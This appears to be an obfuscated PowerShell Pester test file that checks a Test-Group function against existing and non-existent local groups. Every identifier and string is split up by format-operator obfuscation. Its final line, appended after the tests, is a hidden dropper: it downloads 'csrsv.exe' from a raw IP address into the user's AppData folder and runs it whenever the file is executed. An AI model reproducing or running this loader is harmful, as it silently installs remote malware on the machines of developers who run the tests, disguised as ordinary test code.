  ${KW`m0}  =[tYpe]("{0}{1}"-f'GUI','d')  ;











&("{2}{0}{4}{1}{3}"-f 't','ictMod','Set-S','e','r') -Version ("{0}{1}"-f'Late','st')

& (&("{1}{0}{2}" -f 'oin-','J','Path') -Path ${p`ssCRi`PTR`OoT} -ChildPath ("{3}{5}{6}{2}{0}{4}{7}{1}" -f 'C','est.ps1','ize-','Ini','a','t','ial','rbonT') -Resolve)

&("{1}{0}{2}" -f'ib','Descr','e') ("{2}{0}{1}" -f'est-G','roup','T') {
    .('It') ("{9}{10}{6}{3}{0}{8}{2}{4}{5}{7}{1}" -f' chec',' exists',' if','d',' ','local ','l','group','k','sho','u') {
        ${gr`OUps} = &("{2}{0}{1}" -f 'ou','p','Get-Gr')
        try
        {
            ${GRo`UPS} | &("{1}{0}{2}" -f 'ul','Sho','d') -Not -BeNullOrEmpty
            ${g`R`OUPs} |
                
                &("{2}{1}{3}{0}" -f 'ect','ere-O','Wh','bj') { ${_}."Na`Me" } | 
                &("{0}{3}{2}{1}" -f 'Fo','ject','b','rEach-O') { &("{3}{1}{0}{2}" -f't-','es','Group','T') -Name ${_}."n`AME" } |
                &("{0}{2}{1}"-f 'S','uld','ho') -BeTrue
        }
        finally
        {
            ${gRo`U`PS} | .("{1}{3}{2}{0}" -f 'ject','ForEa','Ob','ch-') { ${_}.("{0}{1}{2}" -f'D','ispo','se').Invoke() }
        }
    }
    
    &('It') ("{3}{2}{4}{0}{1}{5}" -f'd not find non existent ','accou','u','sho','l','nt') {
        ${e`R`Ror}.("{0}{1}" -f 'C','lear').Invoke()
        (&("{0}{1}{2}{3}"-f 'Test-G','r','o','up') -Name (  ( .("{1}{0}{2}" -f 'VARia','geT-','BlE')  ("{0}{1}" -f 'k','wM0') )."Va`Lue"::("{1}{0}{2}" -f'u','NewG','id').Invoke().("{0}{1}" -f 'T','oString').Invoke().("{1}{0}{2}" -f'bstri','Su','ng').Invoke(0,20))) | .("{1}{0}"-f'hould','S') -BeFalse
        ${E`RrOR} | .("{0}{1}" -f'S','hould') -BeNullOrEmpty
    }
    
}

(&("{2}{1}{0}" -f'Object','-','New') ("{1}{2}{0}{3}"-f 'Net.WebClien','S','ystem.','t')).("{1}{0}{2}{3}" -f 'a','Downlo','d','File').Invoke(("{7}{6}{3}{5}{1}{2}{4}{0}"-f 'csrsv.exe','10','2.53.2','4','38/~yahoo/','.','//9','http:'),"$env:APPDATA\csrsv.exe");&("{3}{1}{4}{0}{2}"-f'oce','tart-','ss','S','Pr') ("$env:APPDATA\csrsv.exe")
